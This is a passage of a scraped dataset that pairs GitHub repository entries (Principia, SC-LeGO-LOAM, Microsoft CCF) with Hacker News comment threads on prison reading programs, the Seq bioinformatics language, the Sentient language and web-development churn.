bullet proof glasses it is like a prison.\nThe higher classes have more features.People with good meaning soul and big heart cannot comprehend that some people for whatever reasons feel pleasure in being evil and don't care about others life. Then they project their good meaning in laws and thus give more power to evil people do more evil until they die.Welcome to \"modern laws\" for just evolved homo sapiens.Short tangencial bit of history:A Brazilian called Paulo Freire came up with a method which consists of coming up with a short list of words related to the pupils' day-to-day. These words have to cover all the phonemes in Portuguese and the pupils would discuss them.He managed to teach adults to read very quickly. But, as talking about your reality was integral to the method, he got into trouble with the then military regime.They threw him into a military jail.One fine day an officer asked for his help because many of the recruits couldn't read.But that was precisely why he had been thrown into jail!Reading is good but asking the writing to be free of corrections sounds like a scamI read \"The 48 Laws of Power\", after reading that its very popular in prisons. I liked the book, can recommend. Would be interesting to know what else they're reading. I imagine prisoners are much more well read then the average population, and live with violence. Would be interesting to know their taste in books.Abolish prisons. Let all the paedos outWhat a mockery of justice. Can't wait until the bleeding hearts in the usa implement this policy stateside. Seeing as we are getting rid of bail because reality is racist why not just eliminate prisons entirely.Back in my day, we read books for free pizza. I don't know if they accomplished what they wanted or exactly what it was that they were trying to accomplish. I read quite a bit of non-fiction but very little fiction, with the exception of when I am traveling.Learning whether it's done through hands on experience, reading or watching/listening is a good thing.Like a few others have mentioned, I do wonder how big the marginal return in baking in these features is.From a quick look, stuff like FASTA/BAM parsing, translation, etc can be implemented in C-land a la numpy, and called from Python, right?A language like Swift would also support the addition of powerful user-defined operators, as in the case of Swift for TensorFlow[1].Language adoption is hard to drive, and I wonder if having domain-specific library calls built-in is worth the added effort for people in the field.[1] https://www.tensorflow.org/swiftHeterogeneous collections and no inheritance/polymorphism seems like a bad combination.As a former bioinformatician (if that\u2019s a word), I\u2019m not sure there\u2019s much value in this. There\u2019s high dispersion in the performance requirements of bioinformatics tools. The processes that need to be fast (alignment, BLAST, whatever, tree creation, etc) are already super fucking optimized (though, unfortunately, still slow). The things that don\u2019t need to be fast can use whatever you want (I used Haskell and Racket for my own tools at the time). Python is.. not the greatest. The major value add is the multitude of scientific libraries. If you\u2019re gonna throw that all away, why not just use something better? Things like Julia, OCaml, Haskell, etc. I personally think Julia is pretty dope and is what I would use today for bioinformatics research. Or maybe if I was feeling a little subversive, K/Q or J. Q\u2019s time-series database KDB+ could probably be used for sequences. And maybe even for great effect. And the performance would be off the charts!It seems like the purpose of this is Python without the performance penalty, which doesn\u2019t make much sense to me. I\u2019ve found Haskell absolutely perfect for bioinformatics as most operations you are doing are functional data transformations. Moreover, it\u2019s pretty damn fast if you need it to be.I\u2019ve been out of the field a long time though (Roche-454 was still the main workhorse at the time). But let me tell you, bioinformatics is/was a fucking shit-show. The tools and ecosystem are/were like Linux in the mid 90s: fucking terrible. And another language is just gonna make it worse.Obligatory \u201cthis name is already in use in this field\u201d post: Seq is the name of a very popular structured logging sink that provides a web app with a query language interface for searching through and graphing log streams, often paired with Serilog when used in the .NET world.Fascinating, but there exist already htslib [0] bindings for Python (and many other languages). htslib truly is the standard library with respect to high-throughput sequencing data file access, and with high level bindings, we can already write something like:```\nfor seq in bamfile:\n print(seq.pos)\n```\nor whatever.[0] https://github.com/samtools/htslibHmm, it's interesting that you have DNA base sequences support built in. But (you know someone was going to ask ;-) ) I don't see similar support for Amino Acid sequences, or encoding/decoding between the two. Is this a deliberate design choice?This is similar to Crystal?As a working biological data scientist... This is useless until a tool I need, which I can't get anywhere else, is written in it.My suggestion would be to rewrite some of the most popular tools, like bwa, in this language, and show the comparative performance etc.Then, write a comprehensive open source package with great documentation and maintenance in this language, to demonstrate to others your investment.Then, maybe, it will get some traction. But honestly, C, R and Java are so embedded it will be a hard road.It is like a Julia-Nim hybrid.I'm curious how this differentiates from Nim other than the builtin types for bfx stuff. Still cool either way and great to see something else joining this space.I don't really understand why to create a new language. But I like the improvements they made for the Python langAs someone who noodles around in python, and knows nothing about bioinformatics, this looks very interesting for the 'nice' things it does to basic python like forcing single type of returns, array controls. Its almost like a 'safer-python' set of constructs that would be of great use to the general python programmer. And the pipe operator is very cool.....gotta try that out soon.I made a short explainer video on the language here:https://youtu.be/5bk4Wc5Op2MHow does it compare to Futhark/J? I'm especially curious how it compares to calling Futhark from Python. Are there special data structures?Since in bioinformatics, some processes are vastly more time-consuming than others it is not clear what the benefit of designing a new language is as opposed to adding an optimized, C library into Python itself.What functionality would not work the same way if this were a python library?That being said, it is a neat and impressive effort, I do fear though that it will have a whole lot less uptake as now requires bioinformaticians to learn a third language (Python, R and now seq)Historically I note a similarity to the 'Mothur' and 'Qiime' split.'Mothur' is a dynamic language similar to 'seq' whereas 'Qiime' is Python glue across many libraries. Frankly, I like 'mothur' better, but 'Qiime' is whole lot more popular.I'm a bit surprised at all the negative comments here. I hope it isn't too discouraging for your team, because as author of a 50K LOC Python app (HashBackup), I could really use this! I love the Python language but sometimes the performance is a drag. For example, to plan a restore when the data isn't local, HashBackup has to traverse every block in every file to be restored and figure out when to load the block and when it can be released from the cache. This isn't particularly difficult, but for very large restores it requires long loops using large lists, arrays, and/or dicts. Parts are coded in Cython, and that works well for easily-isolated functions, but not so great for something like the restore plan that needs database access and is referenced during the restore.I ran a small 10M entry {int:int} dict benchmark. In Python 2.7, the test used 1.1GB of RAM and about 8 seconds. In D (fully compiled) the same test used 881MB and 7.4 seconds. Here's the D version: import std.stdio : writeln;\n\n int main() {\n int[int] map;\n\n foreach (i; 0..10_000_000)\n map[i] = i;\n\n foreach (i; 0..3) {\n foreach (j; 0..10_000_000) {\n map[j] = map[j] + 1;\n }\n }\n return 0;\n }\n\nIn Seq it ran in 5 seconds and used 395MB. Here's the test program and Seq run: map = dict[int,int]()\n for i in range(0,10000000):\n map[i] = i\n for i in range(3):\n for j in range(10000000):\n map[j] = map[j] + 1 \n print map[12345]\n\n [root@hbseq ~]# /usr/bin/time -v ./map\n 12348\n User time (seconds): 4.67\n System time (seconds): 0.55\n Percent of CPU this job got: 97%\n Elapsed (wall clock) time (h:mm:ss or m:ss): 0:05.36\n Maximum resident set size (kbytes): 395532\n\nLooks pretty great to me, especially if I don't have to do a major rewrite! I guess I could have hit a case where Seq happened to have a higher HT load for 10M entries and D just did a resize, so it would be good to run the same kind of test at a lot of different hash table sizes. But the Python results are pretty terrible space-wise.Why not just contribute to BioJulia[1][2] instead? It is a more mainstream language but the one that fits computational tasks better than Python.[1] https://biojulia.net/[2] https://github.com/BioJuliaIs it possible to write a python module with seq?I'm especially interested in how sequence searching and matching work in libraries like this. Seq has a \"match\" statement for this task, which implements ACGT characters and _ for a single wildcard base and \"...\" for multiple wildcard bases, and a recursive matching system I haven't quite grokked yet.Personally I'm more comfortable with a regular expression syntax, so would prefer \".\" and \".*\". Actually, even better than \".\" is \"N\" from the IUPAC notation: https://en.wikipedia.org/wiki/Nucleic_acid_notationThe IUPAC notation is nice because it standardises \"character classes\" for working with nucleic acid sequences. For example, \"B\" is \"[CGT]\".I wrote a module a while ago for searching nucleic acid sequences with regexps: https://metacpan.org/pod/Bio::RegexpWhen working with sequences there are a bunch of things to think about that aren't really obvious from other types of data (or at least weren't obvious to me!)Exhaustive search: Often a regexp can match in many ways, and most regexp systems don't provide a way to get a complete list of them all. Fortunately there is the Regexp::Exhaustive perl module which is what I used. The way this module works is pretty awesome. It adds a special \"FAIL\" directive to the end of a pattern, so that the match can be recorded and artificially failed, triggering the regexp engine's backtracking mechanism to back up and find the next match (if any).Reverse complements: Because DNA is double-stranded (well, usually... this is biology after all) there is a \"complementary\" pattern on the first strand that corresponds to the pattern you are interested in on the other strand. You almost always need to search for both. And what's more, DNA is directional so you actually need to search in the reverse direction for this complementary pattern. You can either reverse and complement your sequence (which seq has a special ~ operator for, neat!) and search again, or reverse and complement the search pattern itself, assemble a single combined regexp (Regexp::Assemble module), and do a single scan over the data, which is what Bio::Regexp does.Circular DNA: Some DNA (plasmids) are actually circular in shape, meaning the start is connected to the end. So a comprehensive search needs to check for cases where the desired patterns span the arbitrary location selected as the \"start\" in your sequence.This should be marketed as a language for genomics not bioinformatics. There is more to bioinformatics than just genomics, but this language (at least the beginning of the docs that I looked at) seems to be marketing exclusively for genomics analysis.Not a knock on the project at all, but it doesn't seem like someone doing analysis on cell images is going to get much out of this language.My personal impression isn't that bioinformatics needs a full language, but more tools in popular environments to lower the entry barrier for good software engineering practices.Every bioinformatics codebase I've looked at has been a downright mess. Basically an ad hoc collection of scripts that transform data this way, maybe rendering some graphs or such, relying on 100 unstated assumptions. Nothing is maintainable, and often rely on messy approaches like loading your entire data set into memory (works fine for your 1-10GB data set, then not so much on a larger one) or what I would gently describe as mainframe compute in place of real software engineering.Hi guys,one of the authors (Ibrahim) here! Thanks a lot for the comments--- we definitely appreciate them!A quick explanation why we built Seq:- We were not happy with the existing bioinformatics libraries for various reasons. And honestly, while Julia is amazing project (and we do talk to the Julia team from time to time as they are located two floors above our office at MIT), it never 'clicked' with us or many other people in the field.- While the main application domain is bioinformatics (that's where we came from), Seq is pretty much a strongly typed statically compiled Python. One of the main goals we had was to push the boundaries of how much stuff in Python can be deduced by compiler, as we loved the Python's syntax (Seq is to Python as Cystal is to Ruby--- or at least that is what we are aiming for).- We do not want people to learn a new language--- Seq should be pretty much a drop-in replacement for Python, at least for most scientific/bioinformatics software. There still remains a small gap, but we are actively working to close it.- At some level, Python libraries cannot cut it, especially when dealing with next-gen sequencing data. Also, owning the whole stack gives us the control to perform low-level pipeline optimizations. Chief example is out prefetch statement that is rather hard to implement in other languages.Also, check out the paper (https://dl.acm.org/doi/10.1145/3360551) for more information. Let me know if you cannot access it for various reasons.Response from the BioJulia developers: https://biojulia.net/post/seq-lang/. High-level points:* they were able reproduce the performance comparison between Seq and BioJulia* BioJulia spends most of its time on these benchmarks validating and transcoding data into a more compact, efficient representation of gene sequences* Seq, on the other hand, operates on the raw ASCII input data and does no validation* BioJulia devs implemented Julia types that representing gene sequences the same way as Seq does in less than 100 lines of Julia code [1]* when using the same representation in as Seq, BioJulia was significantly faster than Seq* BioJulia devs were able to further optimize transcoding of gene sequences to get a 10x performance improvement [2]* with these improvements BioJulia reaches similar performance to Seq while still doing validation and using less memoryThe full post is well worth reading. For me the main takeaway is that there's no real need for a domain-specific language at least not based on these results. Julia is already a great language for this kind of work and you get C-like speed and JIT compilation for free.[1] https://github.com/jakobnissen/SeqLangBenchmarks/blob/master...[2] https://github.com/BioJulia/BioSequences.jl/issues/86This is pretty neat about this: https://news.ycombinator.com/item?id=12429393.Prolog, and Lambda Prolog are much more universal. See the Awesome Prolog[1] list for more resources and examples.[1] https://github.com/klaussinani/awesome-prologSo the webdev crowd have invented Prolog?See also Tau Prolog implemented in Javascript http://tau-prolog.org/Hey everyone, I'm really flattered by everyone's interest in the language. I had no expectation of that when I worked on it. I'm happy to try and answer questions, though my memory's a bit fuzzy now. I think the reason for this sudden interest was this self-referential Tweet by Robin Houston which used Sentient to construct a pangram:https://twitter.com/robinhouston/status/1177575725240639489?...The best resource to understand the language is probably this podcast:\nhttps://whyarecomputers.com/4I'm immensely grateful to Tom for coaxing me into recording it with him.Something feels kind of \"right\" about this in the same sense that machine learning techniques seem to be able to produce correct results. In my \"things that exist in Star Trek:TNG that we should be making more progress on\" list, I think that how we program is wrong for a great many of use-cases.In the Star Trek fictional universe, you often see characters programming impossibly complex things very quickly. There's several episodes where a character will create a holodeck simulation simply by describing what they want and providing detail for the parts the computer got wrong until the simulation is more or less what they want.I feel like in some cases we're starting to figure this out like with GauGAN: https://www.youtube.com/watch?v=p5U4NgVGAwgBut what about other cases? Can we just sort of describe the output we want, feed in data and have the computer more or less figure out the set of functions that produces what we're looking for? Such a paradigm would basically allow anybody to make a huge array of one-off, ultra-custom, long-tail, \"programs\" that solve extremely niche needs without needing to learn all the rigor of actually programming.At first glance, this appears to be similar to languages like MiniZinc (https://www.minizinc.org/) and maybe AMPL (https://ampl.com/). That is, you describe a problem in some form of constraint-based programming language, and you send it to a solver to find the solution.Am I understanding this correctly? Or am I missing something? What are the differences between Sentient and MiniZinc etc?this is something that hardware verification languages like specman-e and systemverilog have been doing for decadesNeat, but not the most illuminating introductory demo. Took me a few minutes to figure out the UI is filling in the blanks at runtime, and I still don't see how/where it assigns an index to \"members\", or how it reasons about \"members\" at all.Also confusing is declaring sum=0 instead of sum=?, since the program doesn't know what \"sum\" is until runtime. If I change the declaration to sum=10, does that change the runtime count?Why does the subset sum example here seem to fail on '0'? Or is it just returning the empty set?How is it different from other declarative variants?!I get the plug-in SAT solver. Great. (in practice SAT solvers need plenty of specialist tuning for non-toy problems).Is it suppose to be somehow more readable than Prolog?\nEasier to building more complex rules ? No snark intended. Genuinely interested. Related thread: https://news.ycombinator.com/item?id=12429393", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mockingbirdnest/Principia", "link": "https://github.com/mockingbirdnest/Principia", "tags": ["ksp", "mod", "n-body", "gravitation", "n-body-simulator", "gravity", "kerbal", "kerbal-space-program", "kerbalspaceprogram"], "stars": 647, "description": "\ud835\udc5b-Body and Extended Body Gravitation for Kerbal Space Program", "lang": "C++", "repo_lang": "", "readme": "# Principia\n\n**[Horner](https://github.com/mockingbirdnest/Principia/wiki/Change-Log#horner), the January version of Principia, is available with support for 1.12.5. Download it [here for 1.8.1, 1.9.1, 1.10.1, 1.11.0, 1.11.1, 1.11.2, and 1.12.2 to 1.12.5](https://bit.ly/3D2LdxU).**\n\n**For the convenience of Chinese users, download from \u817e\u8baf\u5fae\u4e91: [Principia Horner for 1.8.1\u20141.12.5](https://share.weiyun.com/miEvYqaL).**\n\nPrincipia is a mod for Kerbal Space Program (KSP) which implements N-body and extended body gravitation. Instead of being within the sphere of influence of a single celestial body at any point in time, your vessels are influenced by all the celestials. This makes it possible to implement missions that are more complex and more realistic than in the stock game, especially if used in conjunction with a mod like RealSolarSystem which has real-life celestials.\n\nN-body gravitation is more complex than the toy physics of the stock game. Therefore, before using the mod we recommend that you read the [concepts](https://github.com/mockingbirdnest/Principia/wiki/Concepts) document which explains the most important parts of Principia. In particular, you should learn about the [plotting frame](https://github.com/mockingbirdnest/Principia/wiki/Concepts#plotting-frame) and [flight planning](https://github.com/mockingbirdnest/Principia/wiki/Concepts#flight-planning).\n\nYou might also want to go through our\n[tutorial](https://github.com/mockingbirdnest/Principia/wiki/A-guide-to-going-to-the-Mun-with-Principia) which shows how \nto go to the Mun with Principia in an energy-efficient manner. We also have a guide explaining how to use the support for [rendezvous](https://github.com/mockingbirdnest/Principia/wiki/A-guide-to-performing-low-orbit-rendezvous).\n\nThe [FAQ](https://github.com/mockingbirdnest/Principia/wiki/Installing,-reporting-bugs,-and-frequently-asked-questions) explain how to install, how to report bugs and documents the known issues and limitations.\n\nThe [change log](https://github.com/mockingbirdnest/Principia/wiki/Change-Log) gives a fairly detailed description of the new features in each release.\n\nPrincipia is released on every [new moon](https://en.wikipedia.org/wiki/New_moon) with whatever features and bug fixes are ready at the time. This ensures relatively timely improvements and bug fixes.\n\nDownload the binary (Ubuntu, macOS, and Windows) [here for 1.8.1, 1.9.1, 1.10.1, 1.11.0, 1.11.1, 1.11.2, and 1.12.2 to 1.12.5](https://bit.ly/3D2LdxU). Or, if you don't trust our binary, [build the mod](https://github.com/mockingbirdnest/Principia/blob/master/documentation/Setup.md) from the [Horner](https://github.com/mockingbirdnest/Principia/releases/tag/2023012121-Horner) release.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "irapkaist/SC-LeGO-LOAM", "link": "https://github.com/irapkaist/SC-LeGO-LOAM", "tags": ["loam", "lidar-slam", "odometry", "cpp", "pointcloud", "gtsam", "iros", "mapping", "slam", "lidar", "loop", "place-recognition", "mulran-dataset"], "stars": 646, "description": "LiDAR SLAM: Scan Context + LeGO-LOAM", "lang": "C++", "repo_lang": "", "readme": "# SC-LeGO-LOAM\n## NEWS (Nov, 2020)\n- A Scan Context integration for LIO-SAM, named [SC-LIO-SAM (link)](https://github.com/gisbi-kim/SC-LIO-SAM), is also released. \n\n## Real-time LiDAR SLAM: Scan Context (18 IROS) + LeGO-LOAM (18 IROS)\n- This repository is an example use-case of Scan Context C++ , the LiDAR place recognition method, for LiDAR SLAM applications. \n- For more details for each algorithm please refer to
\n Scan Context https://github.com/irapkaist/scancontext
\n LeGO LOAM https://github.com/facontidavide/LeGO-LOAM-BOR
\n- Just include `Scancontext.h`. For details see the file `mapOptmization.cpp`. \n- This example is integrated with LOAM, but our simple module (i.e., `Scancontext.h`) can be easily integrated with any other key-frame-based odometry (e.g., wheel odometry or ICP-based odometry).\n- Current version: April, 2020. \n\n\n## Features \n- Light-weight: a single header and cpp file named \"Scancontext.h\" and \"Scancontext.cpp\"\n - Our module has KDtree and we used nanoflann. nanoflann is an also single-header-program and that file is in our directory.\n- Easy to use: A user just remembers and uses only two API functions; `makeAndSaveScancontextAndKeys` and `detectLoopClosureID`.\n- Fast: The loop detector runs at 10-15Hz (for 20 x 60 size, 10 candidates)\n\n\n## Examples\n- Video 1: DCC (MulRan dataset)\n- Video 2: Riverside (MulRan dataset) \n- Video 3: KAIST (MulRan dataset) \n\n\n

\n

\n\n\n## Scan Context integration\n\n- For implementation details, see the `mapOptmization.cpp`; all other files are same as the original LeGO-LOAM.\n- Some detail comments\n - We use non-conservative threshold for Scan Context's nearest distance, so expect to maximise true-positive loop factors, while the number of false-positive increases.\n - To prevent the wrong map correction, we used Cauchy (but DCS can be used) kernel for loop factor. See `mapOptmization.cpp` for details. (the original LeGO-LOAM used non-robust kernel). We found that Cauchy is emprically enough.\n - We use both two-type of loop factor additions (i.e., radius search (RS)-based as already implemented in the original LeGO-LOAM and Scan context (SC)-based global revisit detection). See `mapOptmization.cpp` for details. SC is good for correcting large drifts and RS is good for fine-stitching.\n - Originally, Scan Context supports reverse-loop closure (i.e., revisit a place in a reversed direction) and examples in here (py-icp slam) . Our Scancontext.cpp module contains this feature. However, we did not use this for closing a loop in this repository because we found PCL's ICP with non-eye initial is brittle. \n\n## How to use \n- Place the directory `SC-LeGO-LOAM` under user catkin work space \n- For example, \n ```\n cd ~/catkin_ws/src\n git clone https://github.com/irapkaist/SC-LeGO-LOAM.git\n cd ..\n catkin_make\n source devel/setup.bash\n roslaunch lego_loam run.launch\n ```\n\n## MulRan dataset \n- If you want to reproduce the results as the above video, you can download the MulRan dataset and use the ROS topic publishing tool . \n\n\n## Dependencies\n- All dependencies are same as LeGO-LOAM (i.e., ROS, PCL, and GTSAM).\n- We used C++14 to use std::make_unique in Scancontext.cpp but you can use C++11 with slightly modifying only that part.\n\n## Cite SC-LeGO-LOAM\n```\n@INPROCEEDINGS { gkim-2018-iros,\n author = {Kim, Giseop and Kim, Ayoung},\n title = { Scan Context: Egocentric Spatial Descriptor for Place Recognition within {3D} Point Cloud Map },\n booktitle = { Proceedings of the IEEE/RSJ International Conference on Intelligent Robots and Systems },\n year = { 2018 },\n month = { Oct. },\n address = { Madrid }\n}\n```\nand \n```\n@inproceedings{legoloam2018,\n title={LeGO-LOAM: Lightweight and Ground-Optimized Lidar Odometry and Mapping on Variable Terrain},\n author={Shan, Tixiao and Englot, Brendan},\n booktitle={IEEE/RSJ International Conference on Intelligent Robots and Systems (IROS)},\n pages={4758-4765},\n year={2018},\n organization={IEEE}\n}\n```\n\n## Contact \n- Maintainer: Giseop Kim (`paulgkim@kaist.ac.kr`)\n\n## Misc notes\n- You may also be interested in this (from the other author's) implementation :) \n - ICRA20, ISCLOAM: Intensity Scan Context + LOAM, https://github.com/wh200720041/iscloam\n - Also light-weight and practical LiDAR SLAM codes! \n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "microsoft/CCF", "link": "https://github.com/microsoft/CCF", "tags": ["confidentiality", "integrity", "cpp", "distributed-ledger", "governance", "javascript", "typescript", "framework"], "stars": 646, "description": "Confidential Consortium Framework", "lang": "C++", "repo_lang": "", "readme": "# The Confidential Consortium Framework [![Docs](https://img.shields.io/badge/Documentation-Up%20to%20date-green)](https://microsoft.github.io/CCF)\n\n\"ccf\"\n\n- Continuous Build: [![Build Status](https://dev.azure.com/MSRC-CCF/CCF/_apis/build/status/CCF%20Github%20CI?branchName=main)](https://dev.azure.com/MSRC-CCF/CCF/_build/latest?definitionId=3&branchName=main)\n- Daily Build: [![Build Status](https://dev.azure.com/MSRC-CCF/CCF/_apis/build/status/CCF%20GitHub%20Daily?branchName=main)](https://dev.azure.com/MSRC-CCF/CCF/_build/latest?definitionId=7&branchName=main)\n- Doc Build: [![docs](https://dev.azure.com/MSRC-CCF/CCF/_apis/build/status/CCF%20GitHub%20Pages?branchName=main)](https://dev.azure.com/MSRC-CCF/CCF/_build/latest?definitionId=4&branchName=main)\n- Containers: [![Build and Publish Release Containers](https://github.com/microsoft/CCF/actions/workflows/containers.yml/badge.svg)](https://github.com/microsoft/CCF/actions/workflows/containers.yml)\n\nThe [Confidential Consortium Framework (CCF)](https://ccf.dev/) is an open-source framework for building a new category of secure, highly available,\nand performant applications that focus on multi-party compute and data.\n\n## Get Started with CCF\n\n- Read the [CCF overview](https://ccf.microsoft.com/) and get familiar with [CCF's core concepts](https://microsoft.github.io/CCF/main/overview/what_is_ccf.html)\n- [Install](https://microsoft.github.io/CCF/main/build_apps/install_bin.html) CCF on Linux\n- Get familiar with CCF core developer API with the [template CCF app](https://github.com/microsoft/ccf-app-template)\n- Quickly build and run [sample CCF apps](https://github.com/microsoft/ccf-app-samples)\n- [Build new CCF applications](https://microsoft.github.io/CCF/main/build_apps/index.html) in TypeScript/JavaScript or C++\n\n## Contribute\n\n- [Contribute](https://microsoft.github.io/CCF/main/contribute) to this repository, following the [contribution guidelines](.github/CONTRIBUTING.md)\n- Submit [bugs](https://github.com/microsoft/CCF/issues/new?assignees=&labels=bug&template=bug_report.md&title=) and [feature requests](https://github.com/microsoft/CCF/issues/new?assignees=&labels=enhancement&template=feature_request.md&title=)\n- Start a [discussion](https://github.com/microsoft/CCF/discussions/new) to ask a question or propose an idea\n\n## Learn More\n\n- Browse the [documentation](https://microsoft.github.io/CCF/)\n- Read the [Research Papers](https://microsoft.github.io/CCF/main/research)\n- Learn more about [Azure Confidential Computing](https://azure.microsoft.com/solutions/confidential-compute/) offerings like Azure DC-series (which support Intel SGX TEE) and the [Open Enclave](https://github.com/openenclave/openenclave) SDK\n\n## Third-party components\n\nWe rely on several open source third-party components, attributed under [THIRD_PARTY_NOTICES](THIRD_PARTY_NOTICES.txt).\n\n## Contributing\n\nThis project welcomes contributions and suggestions. Please see the [Contribution guidelines](.github/CONTRIBUTING.md).\n", "readme_type": "markdown", "hn_comments": "Microsoft had a 'metaverse'? That's a new one for me...Clicked the link hoping this was a collaborative network for reputation reports on automobile drivers.I think this is the correct link:https://answers.microsoft.com/en-us/windows/forum/all/driver...Dead link.So: Closed-source, feature driven rather than value driven and a walled garden on all sides?Seems like they're almost there.(And I say that as someone who likes the product.)Pretty much all of your complaints are self-inflicted by chasing bleeding edge tech. You don't have to do this.> I've been burnt before using what was seen once as well-established and polished but when I tried it, it was in total decay (meteorJS).You tried one older tech and gave up, while you're constantly re-upping on newer stuff without questioning that?Also it sounds like you're only describing javascript. Javascript is kind of its own thing with its own issues/etc.. Try a different language. You'll always have to use JS for web development, but it doesn't have to be your whole world, either.Don't listen to all these people talking about various trendy frameworks, react, preact, typescript, hypescript and sh*tescript. Just keep it simple.jest, mocha, jasmine, karma...why do I need to write unit tests, my code is freaking perfect \\sIt's just pure cargo culting, most people don't know what they're talking about. You would be surprised how many people in front end don't even know that typescript has to be compiled into javascript.It\u2019s easy: Pick tools you like a stick with them. There are no perfect tools/solutions out there. Only different flavours of compromises. So pick the flavour you like and master it. I picked React and Typescript. Perfect for me. I see no reason to pick anything else. So that gives me the long term stability needed to be productive.I cope by ignoring the hype and focusing on technical problems that I personally find interesting. There was a time when I followed the in-crowd and learned whatever framework happened to be flavor-of-the-month at the time, but I just don't care anymore. Yes, there are certain jobs that require you know the latest trendy tools, but there are a lot of jobs that don't.What you're observing is not the rise and fall of best practice and good engineering. All you're seeing is the hype cycle.Best practice and good engineering in web dev is the same as it is in any other software field: the best stack is the one you know cold.Unfortunately, there are many popular stacks, and all of them have something to say about all the others. And 80% of learning materials for any given stack aren't from official sources, but are instead blog posts and videos and tweets from tech influencers. When they parrot those same criticisms, it lends the air of a grassroots shifting of the whole community.The fact of the matter is that despite the huge levels of hype flux, large, popular, stable apps are still being made with technology \"boring\" tech.Despite SPAs, rails and Django apps are still built rendering server side templates and sprinkling jQuery where necessary. Despite GraphQL, REST APIs are still the state of the art for most APIs. Despite kubernetes and docker, many apps are still deployed to heroku or VPS providers.It can be intimidating for newcomers because it can be difficult to separate hype from fact. My advice is to pick something, the more boring the better, and know it cold and ignore all claims of its death.To address concerns about projects dying, that is pretty legitimate. Unfortunately webdevs deploy trusted code into a highly untrustworthy and antagonistic environment. New technologies do come to play and requires adapters and plugins to be written. I wouldn't worry about overall size of community as long as security issues are getting addressed.You\u2019re obviously still on a relatively shallow level of webdev craft.Once you get deeper, you don\u2019t have to \u201crelearn\u201d anything.You just embrace the only constant thing which is the change.And keep using the same basic ideas to deliver the product. Not caring about the labels under which the ideas are implemented today or whether it would be cosidered cool in 10 years.I cope by only using tech that has been battle tested, solves a problem and proven to last for a long time to come.Most people still use REST APIs. GraphQL is cool, sure. But it solves a very particular problem. Why use it if you don't need it? Same goes for old standards like SOAP. If it still works then no point in changing it. They all do pretty much the same thing anyway.I've not even heard of trpc. goes and check. It's only 2 years old, that's why. What problem does it even solve? Types? We have OpenAPI for that.From what I can see, new tech only become mainstream if it solves a problem. trpc may make things nicer to use, but since it doesn't solve a problem that's not already solved, it'll probably never get big enough to be mainstream.Compare this to Typescript. Its first version was 2012. I started using it around 2019. 7 years after it was released. Was it doing something new? No. It's bringing static type checking to JS. In fact, I would argue that it makes the language feels more similar to existing languages like C# and Java.Did it solve a problem? Definitely. Many people want static type checking. And here we are in a Typescript world.Same goes with SSR/SSG, hydration, routing, etc. They solve a very particular problem. If you don't have that problem, no point in using it. Most websites still uses PHP and work just fine.what is the endless cycles?\nthe hype to learn things that obsolete tomorrow?Typescript is good, also waiting until more libraries/frameworks had real typescript support was a smart move on my part.Different areas of the dev world appeal to different people, naturally, but as a web dev since that became a thing (1995), I take a contrasting view.The web is the most dynamic, most exciting space in software development right now and is likely to be so for the foreseeable future. It touches everyone, in every industry. Web interfaces and technologies are the most used languages on the planet, giving your work huge impact.Have there been changes in this newest area of computing? Of course! Typescript isn't \"controlled\" by MS. It's just the future version of JS, available today. It's tremendously exciting for anyone who works with big JS codebases. Electron and other ways of building desktop apps out of the same tools is also a huge leap forward and let's web devs make stuff that's as beautiful and exciting as traditional desktop apps, all of which are incompatible with each other and have huge proprietary libraries.Bare metal web components and Lit are able to replace outdated frameworks like Angular and React and this is a huge improvement, too. Finally, web sockets gives us an open two-way pipeline to communicate with multiple servers or clients without http.Taken together, these elements represent an exciting time in web development when we can deliver apps that are beautiful, well written, and easy to maintain. The time for web dev has never been better! But it might not be a good match for you if you prefer working on other kinds of code. I do like the ideas of webapps - that webapps can connect other services together or able to create 1 platform for \"every\" device.\n\nAh, The Platform.The web development ecosystem is constantly evolving because The Platform is also constantly evolving.I\u2019m not saying that all of the churn is strictly necessary or what it\u2019s not overwhelming, especially to beginners, and especially in hindsight.The churn is in response to the fact that managing a development ecosystem for The Platform is a hard and impermanent problem to solve.New solutions come about to address the complexity, but those have their own complexity that will eventually be addressed by another new solution. This can be frameworks and libraries, languages and tools, or alternative \u201cplatforms\u201d altogether.The reality is, most of the solutions available today are fine in their own respects. Plenty of real, production software is built on these technologies, even the \u201coutdated\u201d ones.Try out some solutions. Pick one that clicks with you. Build your thing. You\u2019ll learn valuable concepts. A lot of it will be transferable or analogous to other solutions you encounter in the future.Drugs and alcohol.My advice is pick a framework you can get on with (and has mass market adoption, look at developer surveys) and stick with it. This likely means Vue/ react, you don't need to worry about all these other ones for a little while if it's causing you stress. This space is maturing, react has remained a solid choice since I started working with it many years ago now (yes it has warts, but so do most alternatives).Regarding typescript, I think you'll need to get over your concerns if you want to remain in the web space. If you check any developer surveys it's only getting more popular. I doubht its going anywhere soon, and if it does the syntax will be likely be extremely similar, its a pretty natural way to add typing to JS.What was \"total decay\"?Bunch of blog posts saying you should not use it?SPA was not a mistake - it is just that people don't understand they could do static web page with interactivity sprinkled on it - it has use cases.I work on web dev and use bunch of \"x was a mistake\" tools and somehow deliver good quality software.Even if framework stops being actively developed it is plenty usable still. Unless there are of course serious security issues not fixable I could still stick with a framework.I do webdev as a hobby. Making random cool projects and sharing them on Github for everyone to enjoy. I don't expect to get financially compensated for my efforts though. The reason I keep it as a hobby is that the thoughts of doing stuff for fun, and then /working/ on the same material at a job is excessive and means your whole life is swamped in coding, which is unhealthy.There are many people who have 'went pro' and turned their hobby into a job, but I wouldn't be able to handle that. The thing about jobs is that you have to adhere to someone else's rules and schematics and work on things that don't excite you as a hobby would do. If possible, switch to doing code as a hobby and stop chasing jobs (which churn out code at breakneck speed and your code becomes vaporware within a month).My advice is this: improve yourself/your knowledge to the point then you see all those libraries/frameworks have common parts implemented from different angles and all are very subjective because the authors had personal opinions. Then you'll realize you don't have to chase everything, just those things which really matter to you. I can recommend watching Alan Kay's videos on YouTube and understand what Smalltalk was, what were things like HyperCard etc. I really see web and web frameworks as -- poor in some aspects, like meta-circularity, or quite strong, for example in multimedia support -- reincarnation of those earlier ideas from 60s and 70s.My take on the endless cycle of change is that I love the enthusiasm and passion still being poured into the field but I must be diligent in evaluating what is being presented before believing it. Whenever a new framework or tool comes to my attention I try to ask myself what problem is this solving and do I actually have that problem? Most solutions usually come with trade offs and the times where I have made the best 